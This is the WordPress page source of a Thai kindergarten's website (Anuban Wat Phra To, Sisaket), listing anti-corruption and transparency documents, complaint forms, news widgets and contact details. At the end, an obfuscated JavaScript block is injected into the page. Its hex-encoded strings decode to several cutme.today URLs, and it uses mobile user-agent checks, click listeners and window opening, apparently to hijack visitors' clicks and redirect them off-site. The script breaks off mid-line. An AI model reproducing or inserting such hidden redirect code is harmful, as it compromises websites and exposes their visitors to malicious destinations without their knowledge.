data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แ</a>นวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 